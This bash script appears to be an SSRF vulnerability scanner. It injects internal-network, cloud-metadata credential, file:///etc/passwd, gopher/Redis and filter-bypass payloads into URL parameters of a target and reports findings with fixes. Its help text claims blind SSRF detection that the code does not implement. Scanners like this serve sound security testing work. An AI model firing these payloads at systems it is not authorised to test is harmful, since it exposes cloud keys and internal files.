#!/bin/bash

# SSRF Security Testing Script
# Comprehensive testing for Server-Side Request Forgery vulnerabilities
# Covers: CWE-918
# Usage: ./ssrf-security-test.sh [TARGET_URL] [--quick]

set -e

if [[ "$1" == "--help" || "$1" == "-h" ]]; then
    echo "🌐 SSRF SECURITY SCANNER"
    echo "======================================================"
    echo "Comprehensive testing for Server-Side Request Forgery"
    echo ""
    echo "USAGE: $0 <TARGET_URL> [MODE] [CLEAN_OUTPUT]"
    echo ""
    echo "VULNERABILITY COVERAGE:"
    echo "  • Basic SSRF (CWE-918)"
    echo "  • Cloud Metadata Access (AWS/GCP/Azure)"
    echo "  • Protocol Handler Abuse (file://, gopher://)"
    echo "  • Blind SSRF Detection"
    echo "  • DNS Rebinding"
    exit 0
fi

TARGET_URL="${1:-}"
MODE="${2:-full}"
CLEAN_OUTPUT="${3:-false}"
AUTH_COOKIE="${AUTH_COOKIE:-}"
AUTH_TOKEN="${AUTH_TOKEN:-}"

# SSRF test endpoints (configurable)
SSRF_PARAMS="${SSRF_PARAMS:-url,uri,path,link,src,href,redirect,return,callback,next,dest,destination,redir,redirect_uri,continue,file,load,fetch,request}"

if [ "$CLEAN_OUTPUT" = "true" ]; then
    RED='' GREEN='' YELLOW='' BLUE='' PURPLE='' CYAN='' GRAY='' NC=''
else
    RED='\033[0;31m' GREEN='\033[0;32m' YELLOW='\033[1;33m' BLUE='\033[0;34m'
    PURPLE='\033[0;35m' CYAN='\033[0;36m' GRAY='\033[0;90m' NC='\033[0m'
fi

TESTS_PASSED=0 TESTS_FAILED=0 TESTS_TOTAL=0
HIGH_RISK_FINDINGS=0 MEDIUM_RISK_FINDINGS=0 LOW_RISK_FINDINGS=0
HIGH_RISK_LIST=() MEDIUM_RISK_LIST=() LOW_RISK_LIST=()
AUTH_ERRORS=0  # Track 401/403 responses

# Helper function for authenticated curl requests (supports cookie and bearer token)
auth_curl() {
    if [ -n "$AUTH_TOKEN" ]; then
        curl -H "Authorization: Bearer $AUTH_TOKEN" "$@"
    elif [ -n "$AUTH_COOKIE" ]; then
        curl --cookie "$AUTH_COOKIE" "$@"
    else
        curl "$@"
    fi
}

if [ -z "$TARGET_URL" ]; then
    echo -e "${RED}❌ Error: Target URL is required${NC}"
    exit 1
fi

[[ ! "$TARGET_URL" =~ ^https?:// ]] && TARGET_URL="https://$TARGET_URL"
TARGET_URL="${TARGET_URL%/}"

echo -e "${PURPLE}🌐 SSRF SECURITY SCANNER${NC}"
echo -e "${PURPLE}======================================================${NC}"
echo -e "${BLUE}Target: ${TARGET_URL}${NC}"
echo -e "${BLUE}Mode: ${MODE}${NC}"
echo -e "${BLUE}Timestamp: $(date)${NC}"
[ -n "$AUTH_TOKEN" ] && echo -e "${GREEN}🔐 Bearer token authentication enabled${NC}"
[ -n "$AUTH_COOKIE" ] && echo -e "${GREEN}🔐 Cookie authentication enabled${NC}"
[ -z "$AUTH_TOKEN" ] && [ -z "$AUTH_COOKIE" ] && echo -e "${YELLOW}ℹ️ Running without authentication${NC}"

echo -e ""

get_finding_details() {
    case "$1" in
        "SSRF-INTERNAL")
            echo "🚨 FOUND: SSRF to Internal Network (CWE-918)"
            echo "   RISK: High - Access to internal resources"
            echo "   WHAT: Application fetches attacker-controlled URLs"
            echo "   FIX: Whitelist allowed domains, block internal IPs"
            ;;
        "SSRF-CLOUD")
            echo "🚨 FOUND: SSRF to Cloud Metadata (CWE-918)"
            echo "   RISK: Critical - Cloud credentials exposure"
            echo "   WHAT: Access to cloud instance metadata service"
            echo "   FIX: Block metadata IP ranges, use IMDSv2"
            ;;
        "SSRF-FILE")
            echo "🚨 FOUND: SSRF with file:// Protocol (CWE-918)"
            echo "   RISK: High - Local file disclosure"
            echo "   WHAT: Application accepts file:// protocol"
            echo "   FIX: Whitelist allowed protocols (http/https only)"
            ;;
        "SSRF-BLIND")
            echo "⚠️ FOUND: Potential Blind SSRF"
            echo "   RISK: Medium - Out-of-band interaction detected"
            echo "   WHAT: Application makes outbound requests"
            echo "   FIX: Restrict outbound connections, monitor DNS"
            ;;
    esac
}

# Removed endpoint discovery - now tests only the provided URL with SSRF params

# Test basic SSRF to internal resources
test_internal_ssrf() {
    echo -e "\n${YELLOW}🏠 PHASE 1: INTERNAL NETWORK SSRF${NC}"
    
    local internal_targets=(
        "http://localhost"
        "http://127.0.0.1"
        "http://[::1]"
        "http://0.0.0.0"
        "http://localhost:80"
        "http://localhost:22"
        "http://localhost:3306"
        "http://localhost:6379"
        "http://127.0.0.1:8080"
        "http://192.168.1.1"
        "http://10.0.0.1"
        "http://172.16.0.1"
    )
    
    TESTS_TOTAL=$((TESTS_TOTAL + 1))
    local ssrf_found=false
    
    IFS=',' read -ra PARAMS <<< "$SSRF_PARAMS"
    
    for target in "${internal_targets[@]}"; do
        for param in "${PARAMS[@]}"; do
            # Test GET parameter
            local response=$(auth_curl -si "${TARGET_URL}/?${param}=${target}" --max-time 10 2>/dev/null || echo "")

            # Check for auth errors
            if echo "$response" | head -1 | grep -qE "HTTP/[0-9.]+ (401|403)"; then
                AUTH_ERRORS=$((AUTH_ERRORS + 1))
                continue
            fi

            # Check for signs of successful internal access
            if echo "$response" | grep -qiE "localhost|127\.0\.0\.1|internal|root:|admin|mysql|redis|ssh|<!DOCTYPE|<html|Server:"; then
                ssrf_found=true
                echo -e "${RED}  ⚠️ SSRF detected: ${param}=${target}${NC}"
                break 2
            fi
        done
    done
    
    if [ "$ssrf_found" = true ]; then
        echo -e "${RED}❌ FAIL: Internal SSRF vulnerability detected${NC}"
        get_finding_details "SSRF-INTERNAL"
        TESTS_FAILED=$((TESTS_FAILED + 1))
        HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1))
        HIGH_RISK_LIST+=("SSRF to Internal Network")
    else
        echo -e "${GREEN}✅ PASS: No obvious internal SSRF detected${NC}"
        TESTS_PASSED=$((TESTS_PASSED + 1))
    fi
}

# Test cloud metadata access
test_cloud_metadata() {
    echo -e "\n${YELLOW}☁️ PHASE 2: CLOUD METADATA SSRF${NC}"
    
    local metadata_urls=(
        # AWS
        "http://169.254.169.254/latest/meta-data/"
        "http://169.254.169.254/latest/user-data/"
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
        # GCP
        "http://metadata.google.internal/computeMetadata/v1/"
        "http://169.254.169.254/computeMetadata/v1/"
        # Azure
        "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
        # Digital Ocean
        "http://169.254.169.254/metadata/v1/"
        # Alibaba
        "http://100.100.100.200/latest/meta-data/"
    )
    
    TESTS_TOTAL=$((TESTS_TOTAL + 1))
    local cloud_ssrf=false
    
    IFS=',' read -ra PARAMS <<< "$SSRF_PARAMS"
    
    for metadata_url in "${metadata_urls[@]}"; do
        for param in "${PARAMS[@]}"; do
            local response=$(auth_curl -si "${TARGET_URL}/?${param}=${metadata_url}" \
                -H "Metadata-Flavor: Google" \
                --max-time 10 2>/dev/null || echo "")

            # Check for auth errors
            if echo "$response" | head -1 | grep -qE "HTTP/[0-9.]+ (401|403)"; then
                AUTH_ERRORS=$((AUTH_ERRORS + 1))
                continue
            fi

            # Check for cloud metadata indicators
            if echo "$response" | grep -qiE "ami-id|instance-id|hostname|iam|AccessKeyId|SecretAccessKey|computeMetadata|azEnvironment|digitalocean"; then
                cloud_ssrf=true
                echo -e "${RED}  ⚠️ Cloud metadata access: ${metadata_url}${NC}"
                break 2
            fi
        done
    done
    
    if [ "$cloud_ssrf" = true ]; then
        echo -e "${RED}❌ FAIL: Cloud metadata SSRF detected${NC}"
        get_finding_details "SSRF-CLOUD"
        TESTS_FAILED=$((TESTS_FAILED + 1))
        HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1))
        HIGH_RISK_LIST+=("SSRF to Cloud Metadata")
    else
        echo -e "${GREEN}✅ PASS: No cloud metadata SSRF detected${NC}"
        TESTS_PASSED=$((TESTS_PASSED + 1))
    fi
}

# Test protocol handlers
test_protocol_handlers() {
    echo -e "\n${YELLOW}📂 PHASE 3: PROTOCOL HANDLER TESTING${NC}"
    
    local protocol_payloads=(
        "file:///etc/passwd"
        "file:///etc/hosts"
        "file:///c:/windows/system32/drivers/etc/hosts"
        "file://localhost/etc/passwd"
        "gopher://localhost:6379/_INFO"
        "dict://localhost:6379/INFO"
        "ftp://localhost"
        "ldap://localhost"
    )
    
    TESTS_TOTAL=$((TESTS_TOTAL + 1))
    local protocol_vuln=false
    
    IFS=',' read -ra PARAMS <<< "$SSRF_PARAMS"
    
    for payload in "${protocol_payloads[@]}"; do
        for param in "${PARAMS[@]}"; do
            local response=$(auth_curl -si "${TARGET_URL}/?${param}=${payload}" --max-time 10 2>/dev/null || echo "")

            # Check for auth errors
            if echo "$response" | head -1 | grep -qE "HTTP/[0-9.]+ (401|403)"; then
                AUTH_ERRORS=$((AUTH_ERRORS + 1))
                continue
            fi

            # Check for file contents or protocol response
            if echo "$response" | grep -qiE "root:|localhost|127\.0\.0\.1|REDIS|LDAP|220|230|ftp"; then
                protocol_vuln=true
                echo -e "${RED}  ⚠️ Protocol handler accepted: ${payload}${NC}"
                break 2
            fi
        done
    done
    
    if [ "$protocol_vuln" = true ]; then
        echo -e "${RED}❌ FAIL: Protocol handler SSRF detected${NC}"
        get_finding_details "SSRF-FILE"
        TESTS_FAILED=$((TESTS_FAILED + 1))
        HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1))
        HIGH_RISK_LIST+=("SSRF Protocol Handler Abuse")
    else
        echo -e "${GREEN}✅ PASS: Protocol handlers properly restricted${NC}"
        TESTS_PASSED=$((TESTS_PASSED + 1))
    fi
}

# Test SSRF bypass techniques
test_ssrf_bypasses() {
    echo -e "\n${YELLOW}🔓 PHASE 4: SSRF BYPASS TECHNIQUES${NC}"
    
    local bypass_payloads=(
        # IP encoding bypasses
        "http://2130706433"  # 127.0.0.1 as decimal
        "http://0x7f000001"  # 127.0.0.1 as hex
        "http://017700000001"  # 127.0.0.1 as octal
        "http://127.1"
        "http://127.0.1"
        # URL encoding
        "http://%31%32%37%2e%30%2e%30%2e%31"
        # DNS rebinding
        "http://localtest.me"
        "http://spoofed.burpcollaborator.net"
        # IPv6
        "http://[0:0:0:0:0:ffff:127.0.0.1]"
        # Redirect bypass
        "http://httpbin.org/redirect-to?url=http://localhost"
    )
    
    TESTS_TOTAL=$((TESTS_TOTAL + 1))
    local bypass_found=false
    
    IFS=',' read -ra PARAMS <<< "$SSRF_PARAMS"
    
    for payload in "${bypass_payloads[@]}"; do
        for param in "${PARAMS[@]}"; do
            local response=$(auth_curl -si "${TARGET_URL}/?${param}=${payload}" --max-time 10 2>/dev/null || echo "")

            # Check for auth errors
            if echo "$response" | head -1 | grep -qE "HTTP/[0-9.]+ (401|403)"; then
                AUTH_ERRORS=$((AUTH_ERRORS + 1))
                continue
            fi

            if echo "$response" | grep -qiE "localhost|127\.0\.0\.1|internal|root:|<!DOCTYPE"; then
                bypass_found=true
                echo -e "${RED}  ⚠️ Bypass successful: ${payload}${NC}"
                break 2
            fi
        done
    done
    
    if [ "$bypass_found" = true ]; then
        echo -e "${RED}❌ FAIL: SSRF bypass detected${NC}"
        TESTS_FAILED=$((TESTS_FAILED + 1))
        HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1))
        HIGH_RISK_LIST+=("SSRF Bypass Techniques Work")
    else
        echo -e "${GREEN}✅ PASS: SSRF bypass techniques blocked${NC}"
        TESTS_PASSED=$((TESTS_PASSED + 1))
    fi
}

generate_summary() {
    echo -e "\n${PURPLE}======================================================${NC}"
    echo -e "${PURPLE}📊 SSRF SECURITY SCAN SUMMARY${NC}"
    echo -e "${PURPLE}======================================================${NC}"
    
    echo -e "\n${BLUE}Target: ${TARGET_URL}${NC}"
    echo -e "${BLUE}Scan completed: $(date)${NC}\n"
    
    local pass_rate=0
    [ $TESTS_TOTAL -gt 0 ] && pass_rate=$((TESTS_PASSED * 100 / TESTS_TOTAL))
    
    echo -e "${CYAN}Test Results:${NC}"
    echo -e "  Total: ${TESTS_TOTAL} | ${GREEN}Passed: ${TESTS_PASSED}${NC} | ${RED}Failed: ${TESTS_FAILED}${NC}"
    echo -e "  Pass Rate: ${pass_rate}%\n"
    
    echo -e "${CYAN}Risk Summary:${NC}"
    echo -e "  ${RED}High: ${HIGH_RISK_FINDINGS}${NC} | ${YELLOW}Medium: ${MEDIUM_RISK_FINDINGS}${NC} | ${BLUE}Low: ${LOW_RISK_FINDINGS}${NC}\n"
    
    [ ${#HIGH_RISK_LIST[@]} -gt 0 ] && {
        echo -e "${RED}🚨 HIGH RISK FINDINGS:${NC}"
        for f in "${HIGH_RISK_LIST[@]}"; do echo -e "  ${RED}• ${f}${NC}"; done
        echo ""
    }
    
    # Warn about authentication errors and potential false negatives
    if [ $AUTH_ERRORS -gt 0 ]; then
        echo -e "\n${YELLOW}⚠️  WARNING: ${AUTH_ERRORS} requests returned 401/403 Unauthorized${NC}"
        if [ -z "$AUTH_TOKEN" ] && [ -z "$AUTH_COOKIE" ]; then
            echo -e "${YELLOW}   Results may have FALSE NEGATIVES. Provide credentials to test protected endpoints.${NC}"
        else
            echo -e "${YELLOW}   Provided credentials may be invalid or expired.${NC}"
        fi
    fi

    local score=$((100 - HIGH_RISK_FINDINGS * 25 - MEDIUM_RISK_FINDINGS * 15))
    [ $score -lt 0 ] && score=0

    echo -e "${CYAN}Security Score: ${NC}"
    [ $score -ge 80 ] && echo -e "  ${GREEN}${score}/100 - GOOD${NC}" || \
    [ $score -ge 60 ] && echo -e "  ${YELLOW}${score}/100 - NEEDS IMPROVEMENT${NC}" || \
    echo -e "  ${RED}${score}/100 - CRITICAL${NC}"

    echo -e "\n${PURPLE}======================================================${NC}"
}

# Test SSRF on URLs discovered by ZAP spider (from shared file)
test_spider_urls_ssrf() {
    if [ -z "${ZAP_URLS_FILE:-}" ] || [ ! -f "$ZAP_URLS_FILE" ]; then
        return
    fi

    # Filter for URLs with query parameters (most likely SSRF targets)
    local urls_with_params=$(grep '?' "$ZAP_URLS_FILE" 2>/dev/null | head -20)
    local url_count=$(echo "$urls_with_params" | grep -c '.' 2>/dev/null || echo "0")

    if [ "$url_count" -eq 0 ]; then
        return
    fi

    echo -e "\n${YELLOW}🕸️ PHASE 5: SSRF ON SPIDER-DISCOVERED URLs${NC}"
    echo -e "${CYAN}Testing ${url_count} URLs with query parameters from ZAP spider...${NC}"

    TESTS_TOTAL=$((TESTS_TOTAL + 1))
    local spider_ssrf_found=false

    local internal_payloads=("http://localhost" "http://127.0.0.1" "http://169.254.169.254/latest/meta-data/")

    while IFS= read -r spider_url; do
        [ -z "$spider_url" ] && continue

        # Extract existing parameter names from URL
        local query_string="${spider_url#*\?}"
        local param_names=$(echo "$query_string" | tr '&' '\n' | cut -d'=' -f1)

        for param_name in $param_names; do
            # Only test params that look like they could accept URLs
            if echo "$param_name" | grep -qiE "url|uri|path|link|src|href|redirect|return|callback|next|dest|file|load|fetch|request"; then
                for payload in "${internal_payloads[@]}"; do
                    # Build URL with SSRF payload replacing the parameter value
                    local test_url=$(echo "$spider_url" | sed "s/${param_name}=[^&]*/${param_name}=${payload}/")
                    local response=$(auth_curl -si "$test_url" --max-time 10 2>/dev/null || echo "")

                    if echo "$response" | head -1 | grep -qE "HTTP/[0-9.]+ (401|403)"; then
                        AUTH_ERRORS=$((AUTH_ERRORS + 1))
                        continue
                    fi

                    if echo "$response" | grep -qiE "localhost|127\.0\.0\.1|ami-id|instance-id|root:|internal"; then
                        spider_ssrf_found=true
                        echo -e "${RED}  ⚠️ SSRF via spider URL: ${param_name} in ${spider_url}${NC}"
                        break 3
                    fi
                done
            fi
        done
    done <<< "$urls_with_params"

    if [ "$spider_ssrf_found" = true ]; then
        echo -e "${RED}❌ FAIL: SSRF found in spider-discovered URL${NC}"
        TESTS_FAILED=$((TESTS_FAILED + 1))
        HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1))
        HIGH_RISK_LIST+=("SSRF in Spider-Discovered URL")
    else
        echo -e "${GREEN}✅ PASS: No SSRF in spider-discovered URLs${NC}"
        TESTS_PASSED=$((TESTS_PASSED + 1))
    fi
}

# Main
test_internal_ssrf
test_cloud_metadata

if [ "$MODE" = "full" ]; then
    test_protocol_handlers
    test_ssrf_bypasses
fi

test_spider_urls_ssrf

generate_summary
